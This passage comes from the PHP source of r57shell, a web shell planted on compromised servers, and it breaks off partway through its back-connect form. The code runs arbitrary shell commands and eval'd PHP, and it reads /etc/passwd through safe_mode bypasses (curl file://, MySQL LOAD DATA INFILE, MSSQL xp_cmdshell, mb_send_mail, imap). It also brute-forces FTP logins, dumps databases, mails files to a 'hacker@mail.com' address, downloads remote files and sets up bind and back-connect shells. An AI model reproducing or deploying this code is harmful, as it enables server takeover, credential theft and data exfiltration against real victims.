if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_P
OST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @
ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);
}
if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],
$_POST['loc_file'],$_POST['mode']); }
}
}
@ftp_close($connection);
$_POST['cmd'] = "";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacin
g=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size
=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></t
r></table>"; $_POST['cmd'] = ""; }
@ftp_close($connection);
}
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -
lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr
><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
if($safe_mode)
{
switch($_POST['cmd'])
{
case 'safe_dir':
$d=@dir($dir);
if ($d)
{
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $m
time, $ctime, $bsize) = stat($file);
if($windows){
echo date("d.m.Y H:i",$mtime);
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
else echo $lang[$language._text29];
break;
case 'safe_file':
if(@is_file($_POST['file']))
{
$file = @file($_POST['file']);
if($file)
{
$c = @sizeof($file);
for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
}
else echo $lang[$language._text29];
}
else echo $lang[$language._text31];
break;
case 'test1':
$ci = @curl_init("file://".$_POST['test1_file']."");
$cf = @curl_exec($ci);
echo $cf;
break;
case 'test2':
@include($_POST['test2_file']);
break;
case 'test3':
if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_
port'] = "3306"; }
$db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_PO
ST['test3_mp']);
if($db)
{
if(@mysql_select_db($_POST['test3_md'],$db))
{
$sql = "DROP TABLE IF EXISTS temp_r57_table;";
@mysql_query($sql);
$sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
@mysql_query($sql);
$sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_t
able;";
@mysql_query($sql);
$sql = "SELECT * FROM temp_r57_table;";
$r = @mysql_query($sql);
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]
); }
$sql = "DROP TABLE IF EXISTS temp_r57_table;";
@mysql_query($sql);
}
else echo "[-] ERROR! Can't select database";
@mysql_close($db);
}
else echo "[-] ERROR! Can't connect to mysql server";
break;
case 'test4':
if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_
port'] = "1433"; }
$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_PO
ST['test4_mp']);
if($db)
{
if(@mssql_select_db($_POST['test4_md'],$db))
{
@mssql_query("drop table r57_temp_table",$db);
@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db
);
@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_P
OST['test4_file']."'",$db);
$res = mssql_query("select * from r57_temp_table",$db);
while(($row=@mssql_fetch_row($res)))
{
echo $row[0]."\r\n";
}
@mssql_query("drop table r57_temp_table",$db);
}
else echo "[-] ERROR! Can't select database";
@mssql_close($db);
}
else echo "[-] ERROR! Can't connect to MSSQL server";
break;
case 'test5':
if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
$extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
$lines = file ('/tmp/mb_send_mail');
foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
break;
case 'test6':
$stream = @imap_open('/etc/passwd', "", "");
$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
@imap_close($stream);
break;
case 'test7':
$stream = @imap_open($_POST['test7_file'], "", "");
$str = @imap_body($stream, 1);
echo $str;
@imap_close($stream);
break;
}
}
else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd
']!="db_query")&&($_POST['cmd']!="ftp_brute")){
$cmd_rep = ex($_POST['cmd']);
if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\
n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }}
if ($_POST['cmd']=="ftp_brute")
{
$suc = 0;
foreach($users as $user)
{
$connection = @ftp_connect($ftp_server,$ftp_port,10);
if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"
; $suc++; }
else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($us
er))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
@ftp_close($connection);
}
echo "\r\n-------------------------------------\r\n";
$count = count($users);
if(isset($_POST['reverse'])) { $count *= 2; }
echo $lang[$language.'_text97'].$count."\r\n";
echo $lang[$language.'_text98'].$suc."\r\n";
}
if ($_POST['cmd']=="php_eval"){
$eval = @str_replace("<?","",$_POST['php_eval']);
$eval = @str_replace("?>","",$eval);
@eval($eval);}
if ($_POST['cmd']=="mysql_dump")
{
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump
"; }
else {
if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
else { echo "[-] ERROR! Can't write in dump file"; }
}
}
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
function up_down($id)
{
global $lang;
global $language;
return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getEleme
ntById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" t
itle="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 o
nClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document
.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
}
function div($id)
{
if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="d
isplay: none;">';
return '<div id="'.$id.'">';
}
if(!$safe_mode){
echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1
').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''))
;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir
).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
else{
echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id
2').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir
).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'
_butt6']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id
3').$ts;
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,
$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submi
t','submit',0,$lang[$language.'_butt11']));
echo $te.'</div>'.$table_end1.$fe;
if($safe_mode){
echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id
4').$ts;
echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54
,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select na
me=action><option value=create>".$lang[$language.'_text65']."</option><option va
lue=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name
=what><option value=file>".$lang[$language.'_text59']."</option><option value=di
r>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in
('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])
);
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode && $unix){
echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id
5').$ts;
echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><op
tion value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>C
HGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(
2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).w
s(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 titl
e="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("
0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit',
'submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
if(!$safe_mode){
foreach ($aliases as $alias_name=>$alias_cmd)
{
$aliases2 .= "<option>$alias_name</option>";
}
echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6
').$ts;
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select na
me=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','su
bmit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id
7').$ts;
echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,
'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$
dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m'
,0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','c
md',0,'search_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
if(!$safe_mode && $unix){
echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id
8').$ts;
echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,
'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$
dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,
'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('
hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n/
/unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
echo "</textarea>";
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
echo "</div></div></font>";
echo $table_end1.$fe;
if($safe_mode&&$curl_on)
{
echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('i
d10').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file'
,85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('h
idden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$
lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('i
d11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file'
,85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('h
idden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$
lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$mysql_on)
{
echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('i
d12').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',1
5,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang
[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test
3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$
arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_
mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('te
xt','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"
))));
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file'
,96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('h
idden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$
lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$mssql_on)
{
echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('i
d13').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',1
5,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lan
g[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['tes
t4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$a
rrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_m
p']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('tex
t','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")
)));
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',
96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','d
ir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$lan
guage.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$unix&&function_exists('mb_send_mail')){
echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('
id22').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file'
,96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('h
idden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$
lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_list')){
echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('
id23').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',
96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','di
r',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$lang
uage.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_body')){
echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('
id24').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file'
,96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('h
idden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$
lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if(@ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14')
.$ts;
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85
,''));
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=
nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('subm
it','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
if(!$safe_mode&&!$windows){
echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('i
d15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" na
me=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</o
ption><option value=\"lynx\">lynx</option><option value=\"links\">links</option>
<option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>"
.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".
in('text','rem_file',78,'http://'));
echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',1
05,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('i
d16').$ts;
echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,
$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('s
ubmit','submit',0,$lang[$language.'_butt14']));
$arh = $lang[$language.'_text92'];
if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zi
p'; }
if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' g
zip'; }
if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' b
zip'; }
echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',
0,'none').' '.$arh);
echo $te.'</div>'.$table_end1.$fe;
if(@function_exists("ftp_connect")){
echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17'
).$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text87']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_
port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.
0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',
45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_passwor
d',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft
.com"))));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',4
5,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidde
n','cmd',0,'ftp_file_down'));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',4
5,$dir));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode
><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','di
r',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text100']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_
port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.
0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',
45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_passwor
d',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft
.com"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',4
5,$dir));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',4
5,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidde
n','cmd',0,'ftp_file_up'));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode
><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','di
r',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($unix && @function_exists("ftp_connect")){
echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('i
d18').$ts;
echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_
port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.
0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$
language.'_butt1']));
echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a hr
ef=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text10
1']);
echo $te.'</div>'.$table_end1.$fe;
}
if(@function_exists("mail")){
echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19
').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text103']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!e
mpty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mai
l').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(
!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(
!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text
cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'<
/textarea>');
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text104']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!e
mpty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mai
l_file').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(
!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(
!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',4
5,$dir));
echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',
0,'none').' '.$arh);
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($mysql_on||$mssql_on||$pg_on||$ora_on)
{
$select = '<select name=db>';
if($mysql_on) $select .= '<option>MySQL</option>';
if($mssql_on) $select .= '<option>MSSQL</option>';
if($pg_on) $select .= '<option>PostgreSQL</option>';
if($ora_on) $select .= '<option>Oracle</option>';
$select .= '</select>';
echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20'
).$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text40']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server'
,15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b
> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306
"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$ar
row."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l'])
:("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_PO
ST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',1
5,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('
text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")
)));
echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$la
ng[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text
','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))))
;
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text83']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server'
,15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b
> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306
"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$ar
row."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l'])
:("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_PO
ST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',1
5,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$d
ir).in('hidden','cmd',0,'db_query'),"");
echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!em
pty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM use
r; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,
$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
}
if(!$safe_mode&&!$windows){
echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21'
).$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text9']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'1
1457'));
echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',
15,'r57'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" na
me=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></s
elect>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'
_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((ge
tenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'1
1457'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" na
